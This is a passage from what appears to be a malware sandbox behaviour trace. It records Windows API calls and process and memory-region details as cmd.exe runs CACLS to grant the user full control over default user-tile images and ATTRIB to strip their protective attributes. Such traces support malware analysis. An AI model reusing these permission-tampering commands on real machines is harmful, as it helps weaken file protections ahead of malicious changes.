dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f5a8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x24f5a8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd2c, dwThreadId=0x6fc)) returned 1 [0182.587] CloseHandle (hObject=0x4c) returned 1 [0182.587] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0182.587] GetEnvironmentStringsW () returned 0x3a0308* [0182.587] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0182.587] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0182.821] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24f49c | out: lpExitCode=0x24f49c*=0x0) returned 1 [0182.821] CloseHandle (hObject=0x50) returned 1 [0182.821] _vsnwprintf (in: _Buffer=0x24f5e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f4a8 | out: _Buffer="00000000") returned 8 [0182.821] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0182.821] GetEnvironmentStringsW () returned 0x3a2410* [0182.821] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0182.821] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0182.821] GetEnvironmentStringsW () returned 0x3a2410* [0182.821] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0182.822] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f500 | out: lpAttributeList=0x24f500) [0182.822] GetConsoleTitleW (in: lpConsoleTitle=0x24f8e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.822] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.822] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.822] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.822] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0xffffffff [0182.822] GetLastError () returned 0x2 [0182.823] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0xffffffff [0182.823] GetLastError () returned 0x2 [0182.823] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0x39e4d8 [0182.823] FindClose (in: hFindFile=0x39e4d8 | out: hFindFile=0x39e4d8) returned 1 [0182.823] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0xffffffff [0182.823] GetLastError () returned 0x2 [0182.823] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0x39e4d8 [0182.823] FindClose (in: hFindFile=0x39e4d8 | out: hFindFile=0x39e4d8) returned 1 [0182.823] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.823] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.823] GetConsoleTitleW (in: lpConsoleTitle=0x24f678, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.824] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f500, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f5c8 | out: lpAttributeList=0x24f500, lpSize=0x24f5c8) returned 1 [0182.824] UpdateProcThreadAttribute (in: lpAttributeList=0x24f500, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f5c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f500, lpPreviousValue=0x0) returned 1 [0182.824] GetStartupInfoW (in: lpStartupInfo=0x24f4bc | out: lpStartupInfo=0x24f4bc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0182.824] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0182.824] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f55c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f5a8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"", lpProcessInformation=0x24f5a8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xec4, dwThreadId=0x70c)) returned 1 [0182.826] CloseHandle (hObject=0x50) returned 1 [0182.826] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0182.826] GetEnvironmentStringsW () returned 0x3a2410* [0182.826] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0182.826] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0182.911] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x24f49c | out: lpExitCode=0x24f49c*=0x0) returned 1 [0182.911] CloseHandle (hObject=0x4c) returned 1 [0182.911] _vsnwprintf (in: _Buffer=0x24f5e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f4a8 | out: _Buffer="00000000") returned 8 [0182.911] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0182.912] GetEnvironmentStringsW () returned 0x3a2410* [0182.912] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0182.912] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0182.912] GetEnvironmentStringsW () returned 0x3a2410* [0182.912] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0182.912] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f500 | out: lpAttributeList=0x24f500) [0182.912] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.912] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0182.912] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.912] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0182.912] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.912] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0182.912] SetConsoleInputExeNameW () returned 0x1 [0182.912] GetConsoleOutputCP () returned 0x1b5 [0182.912] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.912] SetThreadUILanguage (LangId=0x0) returned 0x409 [0182.913] exit (_Code=0) Process: id = "350" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xd2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "349" os_parent_pid = "0xc54" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25787 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25788 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25789 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25790 start_va = 0xb0000 end_va = 0xb8fff entry_point = 0xb0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25791 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 25792 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25793 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25794 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25795 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 25796 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25797 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25798 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25799 start_va = 0xc0000 end_va = 0x126fff entry_point = 0xc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25800 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 25801 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 25802 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25803 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25804 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25805 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25806 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25807 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25808 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 503 os_tid = 0x6fc Thread: id = 504 os_tid = 0xdcc Process: id = "351" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0xec4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "349" os_parent_pid = "0xc54" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25809 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25810 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25811 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25812 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 25813 start_va = 0xc10000 end_va = 0xc16fff entry_point = 0xc10000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25814 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25815 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25816 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25817 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 25818 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25819 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25820 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25821 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 25822 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 25823 start_va = 0x230000 end_va = 0x296fff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25824 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25825 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25826 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25827 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25828 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25829 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25830 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25831 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25832 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25833 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25834 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25835 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25836 start_va = 0x2a0000 end_va = 0x367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 25837 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25838 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 505 os_tid = 0x70c Process: id = "352" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xd9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25839 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25840 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25841 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25842 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 25843 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 25844 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25845 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25846 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25847 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 25848 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25849 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25850 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25851 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25852 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 25853 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 25854 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 25855 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25856 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25857 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25858 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25859 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25860 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25861 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25862 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25863 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 25864 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25865 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25866 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25867 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 25868 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 25869 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 25870 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 25871 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 25872 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 25873 start_va = 0x1370000 end_va = 0x163efff entry_point = 0x1370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 506 os_tid = 0x394 [0182.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fbe4 | out: lpSystemTimeAsFileTime=0x20fbe4*(dwLowDateTime=0xa1f46c60, dwHighDateTime=0x1d440a9)) [0182.965] GetCurrentProcessId () returned 0xd9c [0182.965] GetCurrentThreadId () returned 0x394 [0182.965] GetTickCount () returned 0x346a0 [0182.965] QueryPerformanceCounter (in: lpPerformanceCount=0x20fbdc | out: lpPerformanceCount=0x20fbdc*=23975421073) returned 1 [0182.966] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0182.966] __set_app_type (_Type=0x1) [0182.966] __p__fmode () returned 0x76b331f4 [0182.966] __p__commode () returned 0x76b331fc [0182.966] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0182.966] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0182.966] GetCurrentThreadId () returned 0x394 [0182.966] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x394) returned 0x38 [0182.966] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0182.966] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0182.966] SetThreadUILanguage (LangId=0x0) 